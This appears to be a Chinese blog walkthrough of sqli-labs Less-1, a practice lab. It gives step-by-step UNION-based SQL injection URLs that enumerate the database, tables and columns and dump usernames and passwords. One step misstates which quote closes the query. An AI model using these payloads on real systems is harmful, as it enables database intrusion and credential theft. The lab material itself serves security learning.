前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >sqli-labs练习(第一关)——字符型

sqli-labs练习(第一关)——字符型

作者头像
宸寰客
发布于 2020-07-20 01:49:41
发布于 2020-07-20 01:49:41
60900
代码可运行
举报
文章被收录于专栏:yuancao博客yuancao博客
运行总次数:0
代码可运行

首先,进入靶场

1、判断是数字型还是字符型

在url后面分别添加?id=1, ?id=2, ?id=2-1 ,观察页面的变化,判断是字符型还是数字型。 (如果id=2-1 与 id=1的页面一样,就是数字型;如果id=2-1与id=2的页面一样,就是字符型)

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://172.16.11.222/sqli-labs/Less-1/?id=1

发现它是字符型。

2、通过报错判断闭合符

在id=2后面分别加上' , " 即单引号,双引号

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://172.16.11.222/sqli-labs/Less-1/?id=1%27

发现加'时报错了,而加"是正常显示,说明闭合符是"。所以我们应该使用',不能让它闭合了

3、确认查询的字段数量

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://172.16.11.222/sqli-labs/Less-1/?id=1%27%20order%20by%203%20--+

在后面分别添加order by 1 --+order by 2 --+order by 3 --+……order by n --+,观察是否报错

我们发现在by 3的时候还是正常的,而by 4的时候就没了,说明要查询的字段数量是3个。

4、确认占位信息

…… union select 1,2,3 --+

把id的值换成-1,不让它显示正常的值,然后在后面加上union select 1,2,3 --+。查看字段的占位信息。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://172.16.11.222/sqli-labs/Less-1/?id=-1%27union%20select%201,2,3%20--+

1的位置是dhakkan,固定的,只能在2,3下手。

5、找库名

…… union select 1,2,database() --+,把3换成database(),即在输出3的地方输出数据库名。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://172.16.11.222/sqli-labs/Less-1/?id=-1%27union%20select%201,2,database()%20--+

发现数据库名字是security

6、查表名

…… union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://172.16.11.222/sqli-labs/Less-1/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27--+

group_concat()是把要输出的内容都放在一个分组里输出,如果不加的话,就只会输出第一个表名。如下:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://172.16.11.222/sqli-labs/Less-1/?id=-1%27union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27--+

7、找表字段

至于找哪个表里的内容,当然是users表

…… union select 1,2,group_concat(column_name) from information_schema.COLUMNs where table_schema='security' and table_name='users'--+

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://172.16.11.222/sqli-labs/Less-1/?id=-1%27union%20select%201,2,group_concat(column_name)%20from%20information_schema.COLUMNs%20where%20table_schema=%27security%27%20and%20table_name=%27users%27--+

users表里有id,username,password三个字段。

8、找用户名和密码

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://172.16.11.222/sqli-labs/Less-1/?id=-1%27union%20select%201,2,group_concat(concat_ws(%27,%27,username,password)%20SEPARATOR%20%27|%27)%20from%20users%20--+

账号密码就出来了 不同用户以|分割,账号密码以,隔开

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2020/07/17 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
基于腾讯云ES混合搜索与HAI部署DeepSeek,快速构建RAG 应用
随着数据智能技术的不断发展,以大语言模型(LLM)驱动的AIGC为代表的内容生成技术已经成为企业数据智能能力中不可或缺的一部分。但在实践过程中,LLM(例如ChatGPT)仍存在不少问题,例如信息更新不及时、垂直领域知识匮乏,且可能产生“幻觉”(即生成不准确的内容)等问题。
腾讯云大数据
2025/04/29
1020
智能化招标采购新基建:基于DeepSeek大模型+RAG技术的智能知识服务中枢
在招标采购领域,知识碎片化与信息服务效率已成为行业痛点。传统知识管理方式依赖人工检索,导致效率低下、响应滞后。信源信息数智化招标采购系统依托RAG(检索增强生成)技术,结合DeepSeek大模型,构建智能知识问答服务,实现对内知识沉淀与对外智能服务的双重突破。
用户10809958
2025/04/28
1590
DeepSeek最佳落地实践之AskBot企业级AI助手
在 DeepSeek 风靡全球,并持续在行业推理能力榜单中领跑之时,自 2020 年起便专注于企业级 AI 助手领域的果然智汇 AskBot,宣布集成 DeepSeek 满血版模型后,多个应用场景实现升级蜕变。经过百万职场人几年的使用打磨,借大模型升级的契机,AskBot为企业 AI 应用落地打造出全新的 “样板间”。
IT运维技术圈
2025/02/21
2090
DeepSeek最佳落地实践之AskBot企业级AI助手
LLMOps+DeepSeek:大模型升级一体化运维
蛇年伊始,DeepSeek凭借其卓越表现火爆出圈,让AI大模型瞬间成为街头巷尾热议的焦点,也让大众重新燃起对AGI(通用人工智能)“平民化”的信心,DeepSeek通过先进的模型架构,带来的高效率与低成本优势,加快了应用场景的百花齐放。
嘉为蓝鲸
2025/02/21
7430
LLMOps+DeepSeek:大模型升级一体化运维
工业智能化再添利器!如何用DeepSeek开启企业级AI新范式?
近年来,工业企业纷纷尝试引入AI技术优化生产流程,但在实际落地中仍面临诸多挑战:传统AI模型对工业场景的适应性有限,且缺乏足够的行业数据支撑,导致应用效果难以精准实现;同时,大模型对算力需求高、部署成本高、开发效率低等问题,进一步加剧了工厂级AI应用的落地难度。
研华科技
2025/02/28
800
工业智能化再添利器!如何用DeepSeek开启企业级AI新范式?
腾讯云X DeepSeek:API调用+联网搜索,分钟打造企业级 AI 应用
不仅上线了DeepSeek-R1和V3原版模型的API接口,还将它们接入了大模型知识引擎,并支持联网搜索,成为国内率先实现这一能力的云厂商。
小腾资讯君
2025/02/10
1.7K0
嘉为蓝鲸OpsPilot 深度集成 DeepSeek 等大模型,开启智能运维新境界!
在数字化转型的浪潮中,运维工作正面临着复杂度高、效率低、响应慢等挑战。以Open AI 、DeepSeek为领导者的大模型层出不穷,在此背景下,OpsPilot作为新一代智能运维支撑平台,通过深度集成DeepSeek等大语言模型(LLM,Large Language Model),结合领先的ChatOps、知识增强与算法引擎技术,为企业提供智能化、自动化、场景化的智能运维平台引擎。
嘉为蓝鲸
2025/02/21
2750
嘉为蓝鲸OpsPilot 深度集成 DeepSeek 等大模型,开启智能运维新境界!
手把手教你用DeepSeek和Dify打造企业级AI助手
检索增强生成 (RAG) 是一种先进的技术,它通过检索相关知识来增强 AI 响应。通过为模型提供必要的上下文信息,它可以提高响应的准确性和相关性。当您上传内部文档或特定领域的材料时,AI 可以根据这些知识生成更明智的答案。
wayn
2025/03/06
5260
手把手教你用DeepSeek和Dify打造企业级AI助手
企业级AI“脱虚向实”,落地还有几道槛?
从ChatGPT横空出世,到越来越智能化的人形机器人,再到让世人惊艳的Sora文生视频……种种迹象表明,人工智能逐渐迎来产业化的临界点。
科技云报道
2025/04/02
1370
企业级AI“脱虚向实”,落地还有几道槛?
澜舟智搭×DeepSeek:企业智能体平台全面升级,打造AI Agent应用新范式
当前,若论最为炙手可热的国产开源大模型是哪一个?想必毫无疑问当属 DeepSeek。
澜舟科技
2025/02/19
1770
深度解锁AI私有知识库:用 DeepSeek 和 RAGFlow 打造企业级智能平台
时间过的真快呀,又是一周结束了,最近AI和机器人的热度越来越高,能看到相关话题的文章越来越多。我在想,作为一个普通打工仔,我们能做什么,除了不断问AI生成答案,然后问完解决完就扔在脑后?想必不是长久之计,所以将知识沉淀,搭建一个私人知识库,来辅助自己建立脑中的知识库才是最重要的,今天就来给大家介绍如何利用开源项目打造一款私有AI知识库!
希里安
2025/03/31
2840
深度解锁AI私有知识库:用 DeepSeek 和 RAGFlow 打造企业级智能平台
腾讯云大模型知识引擎与DeepSeek-R1:企业智能问答平台的构建实践
随着人工智能技术的迅猛发展,大型语言模型已成为企业数字化转型的重要工具。腾讯云大模型知识引擎(LLM Knowledge Engine,简称LKE)作为面向企业客户及合作伙伴的知识应用构建平台,结合企业专属数据,能够高效构建知识问答等应用。而DeepSeek作为国内领先的大语言模型,以其卓越的表现在众多场景展现出巨大的应用潜力。本文将深入探讨如何利用腾讯云大模型知识引擎与DeepSeek-R1模型,为企业构建高效、精准的智能问答平台。
用户10266550
2025/03/09
2700
运用DeepSeek + Dify 开发智能客服机器人:解锁高效服务新境界
在数字化浪潮中,AI 技术深度革新企业服务模式。DeepSeek 作为一款强大的大语言模型,具备卓越的自然语言处理能力,为各类智能应用筑牢了坚实的底层基础。而 Dify 作为低代码 AI 应用开发平台,极大地降低了开发门槛,企业借助它,即便零代码或仅用少量代码,也能快速搭建多样 AI 应用。Dify 拥有简洁界面、丰富组件,且模型集成能力出众,在众多领域展现出巨大潜力。
架构师精进
2025/04/04
2.6K0
运用DeepSeek + Dify 开发智能客服机器人:解锁高效服务新境界
从封闭到开放!嘉为蓝鲸OpsPilot V3.2 联网检索功能上线,运维效率飙升!
直达原文:【春季发布】OpsPilot V3.2 重磅发布:从私域到开放,新增联网检索能力
嘉为蓝鲸
2025/03/18
930
从封闭到开放!嘉为蓝鲸OpsPilot V3.2 联网检索功能上线,运维效率飙升!
一分钟搭建RAG应用:DeepSeek模型助力企业知识管理新突破
企业中常常存在数据分散的情况,不同部门和系统各自为政,导致信息孤立。这种现象使得员工在需要信息时,往往需要在多个系统中进行搜索,增加了时间成本和难度。
Lion 莱恩呀
2025/02/16
2.2K1
一分钟搭建RAG应用:DeepSeek模型助力企业知识管理新突破
零部署壁垒!DeepSeek 满血版在腾讯云大模型下,速构丝滑企业级联网应用
腾讯云大模型知识引擎是一款基于深度学习和大数据技术的人工智能平台,专为大规模知识处理、智能推理和数据分析设计。它通过强大的AI能力,帮助企业和开发者更高效地处理海量数据、构建知识图谱,并提供定制化的智能解决方案。
学无止尽5
2025/03/05
1300
零部署壁垒!DeepSeek 满血版在腾讯云大模型下,速构丝滑企业级联网应用
讯飞星火X1单挑满血版DeepSeek-R1,全国产算力单机部署!中国AI再下一城
时隔一个半月,星火X1在数学能力上大幅跃升,仅以70B参数规模,便追平了o1和DeepSeek-R1。
新智元
2025/03/04
1030
讯飞星火X1单挑满血版DeepSeek-R1,全国产算力单机部署!中国AI再下一城
混元+DeepSeek「双模」驱动,腾讯云助推20+行业精准适配AI场景
截至目前,来自政务、金融、教育、消费电子、医疗、零售等20多个行业的企业或单位,已通过腾讯云接入DeepSeek-R1!
小腾资讯君
2025/02/26
2770
腾讯云大模型知识引擎驱动的DeepSeek满血版医疗顾问大模型搭建实战
作为一名对医疗智能化充满热情的开发者,我决定利用腾讯云大模型知识引擎(LKE)驱动的DeepSeek满血版模型,搭建一个专为医疗场景设计的医疗顾问大模型。这个项目不仅是为了响应医疗行业对高效、智能解决方案的迫切需求,也是我探索大模型技术在专业领域应用的一次实践尝试。在这个过程中,我将对模型进行全面配置,以确保它能够精准理解用户需求并提供专业化的医疗建议。
熊文豪
2025/03/02
4361
腾讯云大模型知识引擎驱动的DeepSeek满血版医疗顾问大模型搭建实战
腾讯云大模型知识引擎×DeepSeek最佳实践有奖征文活动
作为一名对教育智能化充满热情的开发者,我决定利用腾讯云大模型知识引擎(LKE)驱动的DeepSeek满血版模型,搭建一个专为教育场景设计的教育顾问大模型。这个项目不仅是为了响应教育行业对高效、智能解决方案的迫切需求,也是我探索大模型技术在专业领域应用的一次实践尝试。在这个过程中,我将对模型进行全面配置,以确保它能够精准理解用户需求并提供专业化的医疗建议。
用户11539083
2025/03/02
1450
推荐阅读
基于腾讯云ES混合搜索与HAI部署DeepSeek,快速构建RAG 应用
1020
智能化招标采购新基建:基于DeepSeek大模型+RAG技术的智能知识服务中枢
1590
DeepSeek最佳落地实践之AskBot企业级AI助手
2090
LLMOps+DeepSeek:大模型升级一体化运维
7430
工业智能化再添利器!如何用DeepSeek开启企业级AI新范式?
800
腾讯云X DeepSeek:API调用+联网搜索,分钟打造企业级 AI 应用
1.7K0
嘉为蓝鲸OpsPilot 深度集成 DeepSeek 等大模型,开启智能运维新境界!
2750
手把手教你用DeepSeek和Dify打造企业级AI助手
5260
企业级AI“脱虚向实”,落地还有几道槛?
1370
澜舟智搭×DeepSeek:企业智能体平台全面升级,打造AI Agent应用新范式
1770
深度解锁AI私有知识库:用 DeepSeek 和 RAGFlow 打造企业级智能平台
2840
腾讯云大模型知识引擎与DeepSeek-R1:企业智能问答平台的构建实践
2700
运用DeepSeek + Dify 开发智能客服机器人:解锁高效服务新境界
2.6K0
从封闭到开放!嘉为蓝鲸OpsPilot V3.2 联网检索功能上线,运维效率飙升!
930
一分钟搭建RAG应用:DeepSeek模型助力企业知识管理新突破
2.2K1
零部署壁垒!DeepSeek 满血版在腾讯云大模型下,速构丝滑企业级联网应用
1300
讯飞星火X1单挑满血版DeepSeek-R1,全国产算力单机部署!中国AI再下一城
1030
混元+DeepSeek「双模」驱动,腾讯云助推20+行业精准适配AI场景
2770
腾讯云大模型知识引擎驱动的DeepSeek满血版医疗顾问大模型搭建实战
4361
腾讯云大模型知识引擎×DeepSeek最佳实践有奖征文活动
1450
相关推荐
基于腾讯云ES混合搜索与HAI部署DeepSeek,快速构建RAG 应用
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验